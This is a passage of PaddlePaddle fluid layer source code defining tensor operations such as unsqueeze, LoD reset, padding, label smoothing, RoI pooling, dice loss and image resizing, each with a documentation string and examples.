['float32', 'float64', 'int8', 'int32', 'int64'],
'squeeze')
check_type(axes, 'axes', list, 'squeeze')
out = helper.create_variable_for_type_inference(dtype=input.dtype)
x_shape = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type="squeeze2",
inputs={"X": input},
attrs={"axes": axes},
outputs={"Out": out,
"XShape": x_shape})
return out
def unsqueeze(input, axes, name=None):
"""
Insert single-dimensional entries to the shape of a Tensor. Takes one
required argument axes, a list of dimensions that will be inserted.
Dimension indices in axes are as seen in the output tensor.
For example:
.. code-block:: text
Given a tensor such that tensor with shape [3, 4, 5],
then Unsqueezed tensor with axes=[0, 4] has shape [1, 3, 4, 5, 1].
Args:
input (Variable): The input Tensor to be unsqueezed. It is a N-D Tensor of data types float32, float64, int32.
axes (int|list|tuple|Variable): Indicates the dimensions to be inserted. The data type is ``int32`` . If ``axes`` is a list or tuple, the elements of it should be integers or Tensors with shape [1]. If ``axes`` is an Variable, it should be an 1-D Tensor .
name (str|None): Name for this layer.
Returns:
Variable: Output unsqueezed Tensor, with data type being float32, float64, int32, int64.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.layers.data(name='x', shape=[5, 10])
y = fluid.layers.unsqueeze(input=x, axes=[1])
"""
if not isinstance(axes, (int, list, tuple, Variable)):
raise TypeError(
"The type of 'axes' in unsqueeze must be int, list, tuple or Variable, but "
"received %s." % (type(axes)))
helper = LayerHelper("unsqueeze2", **locals())
inputs = {"X": input}
attrs = {}
def _to_Variable_list(one_list):
Variable_list = []
for ele in one_list:
if isinstance(ele, Variable):
ele.stop_gradient = True
Variable_list.append(ele)
else:
assert (isinstance(ele, int))
temp_out = helper.create_variable_for_type_inference('int32')
fill_constant([1], 'int32', ele, force_cpu=True, out=temp_out)
Variable_list.append(temp_out)
return Variable_list
if isinstance(axes, int):
axes = [axes]
if isinstance(axes, Variable):
axes.stop_gradient = True
inputs["AxesTensor"] = axes
elif isinstance(axes, (list, tuple)):
if utils._contain_var(axes):
inputs["AxesTensorList"] = _to_Variable_list(axes)
else:
attrs["axes"] = axes
out = helper.create_variable_for_type_inference(dtype=input.dtype)
x_shape = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type="unsqueeze2",
inputs=inputs,
attrs=attrs,
outputs={"Out": out,
"XShape": x_shape})
return out
def lod_reset(x, y=None, target_lod=None):
"""
Set LoD of :attr:`x` to a new one specified by :attr:`y` or
:attr:`target_lod`. When :attr:`y` provided, :attr:`y.lod` would be
considered as target LoD first, otherwise :attr:`y.data` would be
considered as target LoD. If :attr:`y` is not provided, target LoD should
be specified by :attr:`target_lod`. If target LoD is specified by
:attr:`y.data` or :attr:`target_lod`, only one level LoD is supported.
.. code-block:: text
* Example 1:
Given a 1-level LoDTensor x:
x.lod = [[ 2, 3, 1 ]]
x.data = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0]]
x.dims = [6, 1]
target_lod: [4, 2]
then we get a 1-level LoDTensor:
out.lod = [[4, 2]]
out.data = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0]]
out.dims = [6, 1]
* Example 2:
Given a 1-level LoDTensor x:
x.lod = [[2, 3, 1]]
x.data = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0]]
x.dims = [6, 1]
y is a Tensor:
y.data = [[2, 4]]
y.dims = [1, 3]
then we get a 1-level LoDTensor:
out.lod = [[2, 4]]
out.data = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0]]
out.dims = [6, 1]
* Example 3:
Given a 1-level LoDTensor x:
x.lod = [[2, 3, 1]]
x.data = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0]]
x.dims = [6, 1]
y is a 2-level LoDTensor:
y.lod = [[2, 2], [2, 2, 1, 1]]
y.data = [[1.1], [2.1], [3.1], [4.1], [5.1], [6.1]]
y.dims = [6, 1]
then we get a 2-level LoDTensor:
out.lod = [[2, 2], [2, 2, 1, 1]]
out.data = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0]]
out.dims = [6, 1]
Args:
x (Variable): Input variable which could be a Tensor or LoDTensor.
y (Variable|None): If provided, output's LoD would be derived
from :attr:`y`.
target_lod (list|tuple|None): One level LoD which should be considered
as target LoD when :attr:`y` not provided.
Returns:
Variable: Output variable with LoD specified by this layer.
Raises:
ValueError: If :attr:`y` and :attr:`target_lod` are both None.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.layers.data(name='x', shape=[10])
y = fluid.layers.data(name='y', shape=[10, 20], lod_level=2)
out = fluid.layers.lod_reset(x=x, y=y)
"""
check_variable_and_dtype(x, 'x', ['float32', 'float64', 'int32', 'int64'],
'lod_reset')
helper = LayerHelper("lod_reset", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
if y is not None:
if y.lod_level > 0:
check_variable_and_dtype(
y, 'y', ['float32', 'float64', 'int32', 'int64'], 'lod_reset')
else:
check_variable_and_dtype(y, 'y', ['int32', 'int64'], 'lod_reset')
helper.append_op(
type="lod_reset", inputs={'X': x,
'Y': y}, outputs={'Out': out})
elif target_lod is not None:
helper.append_op(
type="lod_reset",
inputs={'X': x},
attrs={'target_lod': target_lod},
outputs={'Out': out})
else:
raise ValueError("y and target_lod should not be both none.")
return out
def lod_append(x, level):
"""
Append level to LoD of :attr:`x`.
.. code-block:: text
* Example 1:
given a 1-level LoDTensor x:
x.lod = [[ 2, 3, 1 ]]
x.data = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0]]
x.dims = [6, 1]
level: [1, 1, 1, 1, 1, 1, 1]
then we get a 2-level LoDTensor:
x.lod = [[ 2, 3, 1 ], [1, 1, 1, 1, 1, 1]]
x.data = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0]]
x.dims = [6, 1]
Args:
x (Variable): Input variable which could be a tensor or LoDTensor.
level (list|tuple|Variable): The LoD level to be appended into LoD of x.
Returns:
Variable: Output variable with new LoD level.
Raises:
ValueError: If :attr:`y` is None or and :attr:`level` is not Iterator.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.layers.data(name='x', shape=[6, 10], lod_level=1)
out = fluid.layers.lod_append(x, [1,1,1,1,1,1])
"""
from collections import Iterable
if x is None:
raise ValueError("Input(x) can't be None.")
if (not isinstance(level, Iterable)) and (not isinstance(level, Variable)):
raise ValueError("Input(level) must be list, tuple or Variable.")
helper = LayerHelper("lod_append", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
inputs = {'X': x}
attrs = {'append': True}
if isinstance(level, Variable):
inputs['Y'] = level
else:
attrs['target_lod'] = level
helper.append_op(
type="lod_reset", inputs=inputs, attrs=attrs, outputs={'Out': out})
return out
def lrn(input, n=5, k=1.0, alpha=1e-4, beta=0.75, name=None,
data_format='NCHW'):
"""
This operator implements the Local Response Normalization Layer.
This layer performs a type of "lateral inhibition" by normalizing over local input regions.
For more information, please refer to `ImageNet Classification with Deep Convolutional Neural Networks <https://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks.pdf>`_
The formula is as follows:
.. math::
Output(i, x, y) = Input(i, x, y) / \\left(k + \\alpha \\sum\\limits^{\\min(C-1, i + n/2)}_{j = \\max(0, i - n/2)}(Input(j, x, y))^2\\right)^{\\beta}
In the above equation:
- :math:`n` : The number of channels to sum over.
- :math:`k` : The offset (avoid being divided by 0).
- :math:`\\alpha` : The scaling parameter.
- :math:`\\beta` : The exponent parameter.
Args:
input (Variable): Input feature, 4D-Tensor with the shape of [N,C,H,W] or [N, H, W, C],
where N is the batch size, C is the input channel, H is Height, W is weight. The data
type is float32. The rank of this tensor must be 4, otherwise it will raise ValueError.
n (int, optional): The number of channels to sum over. Default: 5
k (float, optional): An offset, positive. Default: 1.0
alpha (float, optional): The scaling parameter, positive. Default:1e-4
beta (float, optional): The exponent, positive. Default:0.75
name (str, optional): The default value is None. Normally there is no need for user to set
this property. For more information, please refer to :ref:`api_guide_Name`
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
Returns:
Variable: A tensor variable storing the transformation result with the same shape and data type as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(
name="data", shape=[None, 3, 112, 112], dtype="float32")
lrn = fluid.layers.lrn(input=data)
print(lrn.shape) # [-1, 3, 112, 112]
print(lrn.dtype) # float32
"""
helper = LayerHelper('lrn', **locals())
dtype = helper.input_dtype()
input_shape = input.shape
dims = len(input_shape)
if dims != 4:
raise ValueError(
"Input's dimension size of Op(lrn) must be 4, but received %d." %
(dims))
if data_format not in ['NCHW', 'NHWC']:
raise ValueError(
"Attr(data_format) of Op(lrn) got wrong value: received " +
data_format + " but only NCHW or NHWC supported.")
mid_out = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
lrn_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="lrn",
inputs={"X": input},
outputs={
"Out": lrn_out,
"MidOut": mid_out,
},
attrs={
"n": n,
"k": k,
"alpha": alpha,
"beta": beta,
"data_format": data_format
})
return lrn_out
def pad(x, paddings, pad_value=0., name=None):
"""
This op will pad a tensor with a constant value given by :attr:`pad_value`, and the
padded shape is specified by :attr:`paddings`.
Specifically, the number of values padded before the elements of :attr:`x`
in dimension :attr:`i` is indicated by :attr:`paddings[2*i]`, and the number
of values padded after the elements of :attr:`x` in dimension :attr:`i` is
indicated by :attr:`paddings[2*i+1]`.
See below for an example.
.. code-block:: text
Given:
x = [[1, 2], [3, 4]]
paddings = [0, 1, 1, 2]
pad_value = 0
Return:
out = [[0, 1, 2, 0, 0]
[0, 3, 4, 0, 0]
[0, 0, 0, 0, 0]]
Args:
x (Variable): Tensor, data type is float32.
paddings (list): A list of integers. Its elements specify the padded
width before and after each dimension in turn.
The length of :attr:`paddings` must be equal to
:math:`rank(x) \\times 2`.
pad_value (float): The constant value used to pad.
name(str, optional): The default value is None.
Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`
Returns:
The padded tensor, with the same data type and rank as :attr:`x`
Return Type:
Variable
Examples:
.. code-block:: python
# x is a rank 2 tensor variable
import paddle.fluid as fluid
x = fluid.data(name='data', shape=[300, 300], dtype='float32')
out = fluid.layers.pad(x=x, paddings=[0, 1, 1, 2], pad_value=0.)
"""
helper = LayerHelper('pad', input=x, **locals())
dtype = helper.input_dtype()
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='pad',
inputs={'X': x},
outputs={'Out': out},
attrs={'paddings': paddings,
'pad_value': float(pad_value)})
return out
def pad_constant_like(x, y, pad_value=0., name=None):
"""
Pad :attr:`y` with :attr:`pad_value`, the number of values padded to
the edges of each axis is specified by the difference of the shape
of :attr:`x` and :attr:`y` . ((0, shape_x_0 - shape_y_0), ... (0, shape_x_n - shape_y_n))
specify padding widths for each axis. The input should be a k-D tensor(k > 0 and k < 7).
See below for an example.
.. code-block:: text
Given:
X = [[[[ 0, 1, 2],
[ 3, 4, 5]],
[[ 6, 7, 8],
[ 9, 10, 11]],
[[12, 13, 14],
[15, 16, 17]]],
[[[18, 19, 20],
[21, 22, 23]],
[[24, 25, 26],
[27, 28, 29]],
[[30, 31, 32],
[33, 34, 35]]]]
X.shape = (2, 3, 2, 3)
Y = [[[[35, 36, 37]],
[[38, 39, 40]],
[[41, 42, 43]]]]
Y.shape = (1, 3, 1, 3)
And
pad_value = 0.
Return:
Out = [[[[35, 36, 37],
[ 0, 0, 0]],
[[38, 39, 40],
[ 0, 0, 0]],
[[41, 42, 43],
[ 0, 0, 0]]],
[[[ 0, 0, 0],
[ 0, 0, 0]],
[[ 0, 0, 0],
[ 0, 0, 0]],
[[ 0, 0, 0],
[ 0, 0, 0]]]]
Out.shape = [2, 3, 2, 3]
Args:
x (Variable): Tensor, its shape specifies the shape of output.
y (Variable): Tensor, its rank is the same with :attr:`x`, and for each dimension :math:`i` ,
:math:`y\_shape[i] <= x\_shape[i]` . The data type can be float32 or float64.
pad_value (float): The constant value used to pad.
name(str, optional): The default value is None.
Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`
Returns:
The padded tensor, with the same shape as :attr:`x` and the same data type as :attr:`y`
Return Type:
Variable
Examples:
.. code-block:: python
# x is a rank 4 tensor variable, x.shape = (2, 3, 2, 3)
# y is a rank 4 tensor variable, y.shape = (1, 3, 1, 3)
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[2,3,2,3], dtype='float32')
y = fluid.data(name='y', shape=[1,3,1,3], dtype='float32')
out = fluid.layers.pad_constant_like(x=x, y=y, pad_value=0.)
# out is a rank 4 tensor variable, and out.shape = [2, 3 ,2 , 3]
"""
helper = LayerHelper('pad_constant_like', input=x, **locals())
dtype = helper.input_dtype()
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='pad_constant_like',
inputs={'X': x,
'Y': y},
outputs={'Out': out},
attrs={'pad_value': float(pad_value)})
return out
def label_smooth(label,
prior_dist=None,
epsilon=0.1,
dtype="float32",
name=None):
"""
Label smoothing is a mechanism to regularize the classifier layer and is called
label-smoothing regularization (LSR).
Label smoothing is proposed to encourage the model to be less confident,
since optimizing the log-likelihood of the correct label directly may
cause overfitting and reduce the ability of the model to adapt. Label
smoothing replaces the ground-truth label :math:`y` with the weighted sum
of itself and some fixed distribution :math:`\mu`. For class :math:`k`,
i.e.
.. math::
\\tilde{y_k} = (1 - \epsilon) * y_k + \epsilon * \mu_k,
where :math:`1 - \epsilon` and :math:`\epsilon` are the weights
respectively, and :math:`\\tilde{y}_k` is the smoothed label. Usually
uniform distribution is used for :math:`\mu`.
See more details about label smoothing in https://arxiv.org/abs/1512.00567.
Parameters:
label(Variable): The input variable containing the label data. The
label data should use one-hot representation. It's
a multidimensional tensor with a shape of
:math:`[N_1, ..., Depth]`, where Depth is class number.
prior_dist(Variable, optional): The prior distribution to be used to smooth
labels. If not provided, an uniform distribution
is used. It's a multidimensional tensor with a shape of
:math:`[1, class\_num]` . The default value is None.
epsilon(float, optional): The weight used to mix up the original ground-truth
distribution and the fixed distribution. The default value is
0.1.
dtype(np.dtype|core.VarDesc.VarType|str, optional): The data type can be set
as 'float32', 'float64'. The default value is 'float32'.
name(str, optional): The default value is None. Normally there is no need for user
to set this property. For more information, please refer to
:ref:`api_guide_Name`.
Returns:
Variable: The tensor variable containing the smoothed labels.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import paddle.fluid.layers as layers
label = layers.data(name="label", shape=[1], dtype="float32")
one_hot_label = layers.one_hot(input=label, depth=10)
smooth_label = layers.label_smooth(
label=one_hot_label, epsilon=0.1, dtype="float32")
"""
if epsilon > 1. or epsilon < 0.:
raise ValueError("The value of epsilon must be between 0 and 1.")
if in_dygraph_mode():
return core.ops.label_smooth(label, prior_dist, 'epsilon',
float(epsilon))
helper = LayerHelper("label_smooth", **locals())
label.stop_gradient = True
smooth_label = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="label_smooth",
inputs={"X": label,
"PriorDist": prior_dist} if prior_dist else {"X": label},
outputs={"Out": smooth_label},
attrs={"epsilon": float(epsilon)})
return smooth_label
@templatedoc()
def roi_pool(input,
rois,
pooled_height=1,
pooled_width=1,
spatial_scale=1.0,
rois_lod=None):
"""
This operator implements the roi_pooling layer.
Region of interest pooling (also known as RoI pooling) is to perform max pooling on inputs of nonuniform sizes to obtain fixed-size feature maps (e.g. 7*7).
The operator has three steps:
1. Dividing each region proposal into equal-sized sections with the pooled_width and pooled_height;
2. Finding the largest value in each section;
3. Copying these max values to the output buffer.
For more information, please refer to https://stackoverflow.com/questions/43430056/what-is-roi-layer-in-fast-rcnn
Args:
input (Variable): Input feature, 4D-Tensor with the shape of [N,C,H,W], where N is the batch size, C is the input channel, H is Height, W is weight. The data type is float32 or float64.
rois (Variable): ROIs (Regions of Interest) to pool over. 2D-LoDTensor with the shape of [num_rois,4], the lod level is 1. Given as [[x1, y1, x2, y2], ...], (x1, y1) is the top left coordinates, and (x2, y2) is the bottom right coordinates.
rois_lod (Variable): The lod info of rois. Default: None
pooled_height (int, optional): The pooled output height, data type is int32. Default: 1
pooled_width (int, optional): The pooled output height, data type is int32. Default: 1
spatial_scale (float, optional): Multiplicative spatial scale factor to translate ROI coords from their input scale to the scale used when pooling. Default: 1.0
Returns:
Variable: The pooled feature, 4D-Tensor with the shape of [num_rois, C, pooled_height, pooled_width].
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
DATATYPE='float32'
place = fluid.CPUPlace()
#place = fluid.CUDAPlace(0)
input_data = np.array([i for i in range(1,17)]).reshape(1,1,4,4).astype(DATATYPE)
roi_data =fluid.create_lod_tensor(np.array([[1., 1., 2., 2.], [1.5, 1.5, 3., 3.]]).astype(DATATYPE),[[2]], place)
rois_lod_data = np.array([0, 2])
x = fluid.data(name='input', shape=[None,1,4,4], dtype=DATATYPE)
rois = fluid.data(name='roi', shape=[None,4], dtype=DATATYPE)
rois_lod = fluid.data(name='rois_lod', shape=[None], dtype='int64')
pool_out = fluid.layers.roi_pool(
input=x,
rois=rois,
pooled_height=1,
pooled_width=1,
spatial_scale=1.0,
rois_lod=rois_lod)
exe = fluid.Executor(place)
out, = exe.run(feed={'input':input_data ,'roi':roi_data, 'rois_lod': rois_lod_data}, fetch_list=[pool_out.name])
print(out) #array([[[[11.]]], [[[16.]]]], dtype=float32)
print(np.array(out).shape) # (2, 1, 1, 1)
"""
helper = LayerHelper('roi_pool', **locals())
dtype = helper.input_dtype()
pool_out = helper.create_variable_for_type_inference(dtype)
argmaxes = helper.create_variable_for_type_inference(dtype='int32')
helper.append_op(
type="roi_pool",
inputs={"X": input,
"ROIs": rois,
"RoisLod": rois_lod},
outputs={"Out": pool_out,
"Argmax": argmaxes},
attrs={
"pooled_height": pooled_height,
"pooled_width": pooled_width,
"spatial_scale": spatial_scale
})
return pool_out
@templatedoc()
def roi_align(input,
rois,
pooled_height=1,
pooled_width=1,
spatial_scale=1.0,
sampling_ratio=-1,
name=None,
rois_lod=None):
"""
${comment}
Args:
input (Variable): ${x_comment}
rois (Variable): ROIs (Regions of Interest) to pool over.It should be
a 2-D LoDTensor of shape (num_rois, 4), the lod level is 1. The
data type is float32 or float64. Given as [[x1, y1, x2, y2], ...],
(x1, y1) is the top left coordinates, and (x2, y2) is the bottom
right coordinates.
rois_lod (Variable): The lod info of rois. Default: None
pooled_height (int32, optional): ${pooled_height_comment} Default: 1
pooled_width (int32, optional): ${pooled_width_comment} Default: 1
spatial_scale (float32, optional): ${spatial_scale_comment} Default: 1.0
sampling_ratio(int32, optional): ${sampling_ratio_comment} Default: -1
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Variable:
Output: ${out_comment}.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(
name='data', shape=[None, 256, 32, 32], dtype='float32')
rois = fluid.data(
name='rois', shape=[None, 4], dtype='float32')
rois_lod = fluid.data(name='rois_lod', shape=[None], dtype='int64')
align_out = fluid.layers.roi_align(input=x,
rois=rois,
pooled_height=7,
pooled_width=7,
spatial_scale=0.5,
sampling_ratio=-1,
rois_lod=rois_lod)
"""
check_variable_and_dtype(input, 'input', ['float32', 'float64'],
'roi_align')
check_variable_and_dtype(rois, 'rois', ['float32', 'float64'], 'roi_align')
helper = LayerHelper('roi_align', **locals())
dtype = helper.input_dtype()
align_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="roi_align",
inputs={"X": input,
"ROIs": rois,
"RoisLod": rois_lod},
outputs={"Out": align_out},
attrs={
"pooled_height": pooled_height,
"pooled_width": pooled_width,
"spatial_scale": spatial_scale,
"sampling_ratio": sampling_ratio
})
return align_out
def dice_loss(input, label, epsilon=0.00001, name=None):
"""
Dice loss for comparing the similarity between the input predictions and the label.
This implementation is for binary classification, where the input is sigmoid
predictions of each pixel, usually used for segmentation task. The dice loss can
be defined as the following equation:
.. math::
dice\_loss &= 1 - \\frac{2 * intersection\_area}{total\_area} \\\\
&= \\frac{(total\_area - intersection\_area) - intersection\_area}{total\_area} \\\\
&= \\frac{(union\_area - intersection\_area)}{total\_area}
Parameters:
input (Variable): Tensor, rank>=2, shape is :math:`[N_1, N_2, ..., N_D]`, where :math:`N_1` is
the batch_size, :math:`N_D` is 1. It is usually the output predictions of sigmoid activation.
The data type can be float32 or float64.
label (Variable): Tensor, the groud truth with the same rank as input, shape is :math:`[N_1, N_2, ..., N_D]`.
where :math:`N_1` is the batch_size, :math:`N_D` is 1. The data type can be float32 or float64.
epsilon (float): The epsilon will be added to the numerator and denominator.
If both input and label are empty, it makes sure dice is 1.
Default: 0.00001
name(str, optional): The default value is None.
Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`
Returns:
The dice loss with shape [1], data type is the same as `input` .
Return Type:
Varaible
Example:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name='data', shape = [3, 224, 224, 1], dtype='float32')
label = fluid.data(name='label', shape=[3, 224, 224, 1], dtype='float32')
predictions = fluid.layers.sigmoid(x)
loss = fluid.layers.dice_loss(input=predictions, label=label)
"""
label = one_hot(label, depth=input.shape[-1])
reduce_dim = list(range(1, len(input.shape)))
inse = reduce_sum(input * label, dim=reduce_dim)
dice_denominator = reduce_sum(
input, dim=reduce_dim) + reduce_sum(
label, dim=reduce_dim)
dice_score = 1 - inse * 2 / (dice_denominator + epsilon)
return reduce_mean(dice_score)
def image_resize(input,
out_shape=None,
scale=None,
name=None,
resample='BILINEAR',
actual_shape=None,
align_corners=True,
align_mode=1,
data_format='NCHW'):
"""
This op resizes a batch of images.
The input must be a 4-D Tensor of the shape (num_batches, channels, in_h, in_w)
or (num_batches, in_h, in_w, channels), or a 5-D Tensor of the shape
(num_batches, channels, in_d, in_h, in_w) or (num_batches, in_d, in_h, in_w, channels),
and the resizing only applies on the three dimensions(depth, height and width).
**Warning:** the parameter :attr:`actual_shape` will be deprecated in the
future and only use :attr:`out_shape` instead.
Supporting resample methods:
'BILINEAR' : Bilinear interpolation
'TRILINEAR' : Trilinear interpolation
'NEAREST' : Nearest neighbor interpolation
Nearest neighbor interpolation is to perform nearest neighbor interpolation
in both the 3rd dimension(in height direction) and the 4th dimension(in width
direction) on input tensor.
Bilinear interpolation is an extension of linear interpolation for
interpolating functions of two variables (e.g. H-direction and
W-direction in this op) on a rectilinear 2D grid. The key idea is
to perform linear interpolation first in one direction, and then
again in the other direction.
Trilinear interpolation is an extension of linear interpolation for
interpolating functions of three variables (e.g. D-direction,
H-direction and W-direction in this op) on a rectilinear 3D grid.
The linear interpolation is performed on three directions.
Align_corners and align_mode are optional parameters,the calculation method
of interpolation can be selected by them.
Example:
.. code-block:: text
For scale:
if align_corners = True && out_size > 1 :
scale_factor = (in_size-1.0)/(out_size-1.0)
else:
scale_factor = float(in_size/out_size)
Nearest neighbor interpolation:
if:
align_corners = False
input : (N,C,H_in,W_in)
output: (N,C,H_out,W_out) where:
H_out = floor (H_{in} * scale_{factor})
W_out = floor (W_{in} * scale_{factor})
else:
align_corners = True
input : (N,C,H_in,W_in)
output: (N,C,H_out,W_out) where:
H_out = round(H_{in} * scale_{factor})
W_out = round(W_{in} * scale_{factor})
Bilinear interpolation:
if:
align_corners = False , align_mode = 0
input : (N,C,H_in,W_in)
output: (N,C,H_out,W_out) where:
H_out = (H_{in}+0.5) * scale_{factor} - 0.5
W_out = (W_{in}+0.5) * scale_{factor} - 0.5
else:
input : (N,C,H_in,W_in)
output: (N,C,H_out,W_out) where:
H_out = H_{in} * scale_{factor}
W_out = W_{in} * scale_{factor}
Trilinear interpolation:
if:
align_corners = False , align_mode = 0
input : (N,C,D_in,H_in,W_in)
output: (N,C,D_out,H_out,W_out) where:
D_out = (D_{in}+0.5) * scale_{factor} - 0.5
H_out = (H_{in}+0.5) * scale_{factor} - 0.5
W_out = (W_{in}+0.5) * scale_{factor} - 0.5
else:
input : (N,C,D_in,H_in,W_in)
output: (N,C,D_out,H_out,W_out) where:
D_out = D_{in} * scale_{factor}
H_out = H_{in} * scale_{factor}
W_out = W_{in} * scale_{factor}
For details of nearest neighbor interpolation, please refer to Wikipedia:
https://en.wikipedia.org/wiki/Nearest-neighbor_interpolation.
For details of bilinear interpolation, please refer to Wikipedia:
https://en.wikipedia.org/wiki/Bilinear_interpolation.
For details of trilinear interpolation, please refer to Wikipedia:
https://en.wikipedia.org/wiki/Trilinear_interpolation.
Parameters:
input (Variable): 4-D or 5-D Tensor, its data type is float32, float64, or uint8,
its data format is specified by :attr:`data_format`.
out_shape(list|tuple|Variable|None): Output shape of image resize
layer, the shape is (out_h, out_w) when input is a 4-D Tensor and is
(out_d, out_h, out_w) when input is a 5-D Tensor. Default: None. If
a list, each element can be an integer or a Tensor Variable of shape: [1].
If a Tensor Variable, its dimensions size should be a 1.
scale(float|Variable|None): The multiplier for the input height or width. At
least one of :attr:`out_shape` or :attr:`scale` must be set.
And :attr:`out_shape` has a higher priority than :attr:`scale`.
Default: None.
name(str|None): A name for this layer(optional). If set None, the layer
will be named automatically.
resample(str): The resample method. It supports 'BILINEAR', 'TRILINEAR'
and 'NEAREST' currently. Default: 'BILINEAR'
actual_shape(Variable): An optional input to specify output shape
dynamically. If provided, image resize
according to this given shape rather than
:attr:`out_shape` and :attr:`scale` specifying
shape. That is to say actual_shape has the
highest priority. It is recommended to use
:attr:`out_shape` if you want to specify output
shape dynamically, because :attr:`actual_shape`
will be deprecated. When using actual_shape to
specify output shape, one of :attr:`out_shape`
and :attr:`scale` should also be set, otherwise
errors would be occurred in graph constructing stage.
Default: None
align_corners(bool) : An optional bool, If True, the centers of the 4 corner pixels of the
input and output tensors are aligned, preserving the values at the
corner pixels.
Default: True
align_mode(int) : An optional for bilinear interpolation. can be \'0\'
for src_idx = scale*(dst_indx+0.5)-0.5 , can be \'1\' for
src_idx = scale*dst_index.
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`, `"NCDHW"`,
`"NDHWC"`. The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`. When it is `"NCHW"`, the data is stored
in the order of: `[batch_size, input_channels, input_depth, input_height, input_width]`.
Returns:
A 4-D Tensor of the shape (num_batches, channels, out_h, out_w) or (num_batches, out_h, out_w, channels),
or 5-D Tensor of the shape (num_batches, channels, out_d, out_h, out_w) or (num_batches, out_d, out_h, out_w, channels).
Raises:
TypeError: out_shape should be a list or tuple or Variable.
TypeError: actual_shape should either be Variable or None.
ValueError: The 'resample' of image_resize can only be 'BILINEAR',
'TRILINEAR' or 'NEAREST' currently.
ValueError: 'BILINEAR' and 'NEAREST' only support 4-D tensor.
ValueError: 'TRILINEAR' only support 5-D tensor.
ValueError: One of out_shape and scale must not be None.
ValueError: out_shape length should be 2 for input 4-D tensor.
ValueError: out_shape length should be 3 for input 5-D tensor.
ValueError: scale should be greater than zero.
TypeError: align_corners should be a bool value
ValueError: align_mode can only be '0' or '1'
ValueError: data_format can only be 'NCHW', 'NHWC', 'NCDHW' or 'NDHWC'.
Examples:
.. code-block:: python
#declarative mode
import paddle.fluid as fluid
import numpy as np
input = fluid.data(name="input", shape=[None,3,6,10])
#1
output = fluid.layers.image_resize(input=input,out_shape=[12,12])
#2
#x = np.array([2]).astype("int32")
#dim1 = fluid.data(name="dim1", shape=[1], dtype="int32")
#fluid.layers.assign(input=x, output=dim1)
#output = fluid.layers.image_resize(input=input,out_shape=[12,dim1])
#3
#x = np.array([3,12]).astype("int32")
#shape_tensor = fluid.data(name="shape_tensor", shape=[2], dtype="int32")
#fluid.layers.assign(input=x, output=shape_tensor)
#output = fluid.layers.image_resize(input=input,out_shape=shape_tensor)
#4
#x = np.array([0.5]).astype("float32")
#scale_tensor = fluid.data(name="scale", shape=[1], dtype="float32")
#fluid.layers.assign(x,scale_tensor)
#output = fluid.layers.image_resize(input=input,scale=scale_tensor)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
input_data = np.random.rand(2,3,6,10).astype("float32")
output_data = exe.run(fluid.default_main_program(),
feed={"input":input_data},
fetch_list=[output],
return_numpy=True)
print(output_data[0].shape)
#1
# (2, 3, 12, 12)
#2
# (2, 3, 12, 2)
#3
# (2, 3, 3, 12)
#4
# (2, 3, 3, 5)
#imperative mode
import paddle.fluid.dygraph as dg
with dg.guard(place) as g:
input = dg.to_variable(input_data)
output = fluid.layers.image_resize(input=input, out_shape=[12,12])
print(output.shape)
# [2L, 3L, 12L, 12L]
"""
resample_methods = {
'BILINEAR': 'bilinear',
'TRILINEAR': 'trilinear',
'NEAREST': 'nearest',
}
if resample not in resample_methods:
raise ValueError(
"The 'resample' of image_resize can only be 'BILINEAR', 'TRILINEAR' "
"or 'NEAREST' currently.")
resample_type = resample_methods[resample]
if resample in ['BILINEAR', 'NEAREST'] and len(input.shape) != 4:
raise ValueError("'BILINEAR' and 'NEAREST' only support 4-D tensor.")
if resample == 'TRILINEAR' and len(input.shape) != 5:
raise ValueError("'TRILINEAR'only support 5-D tensor.")
if not isinstance(align_corners, bool):
raise TypeError("Attr align_corners should be a bool value")
if align_mode != 0 and align_mode != 1:
raise ValueError("align_mode can only be 0 or 1")
if out_shape is None and scale is None:
raise ValueError("One of out_shape and scale must not be None.")
helper = LayerHelper('{}_interp'.format(resample_type), **locals())
dtype = helper.input_dtype()
if len(input.shape) == 4 and data_format not in ['NCHW', 'NHWC']:
raise ValueError(
"Got wrong value for param `data_format`: " + data_format +
" received but only `NCHW` or `NHWC` supported for 4-D input.")
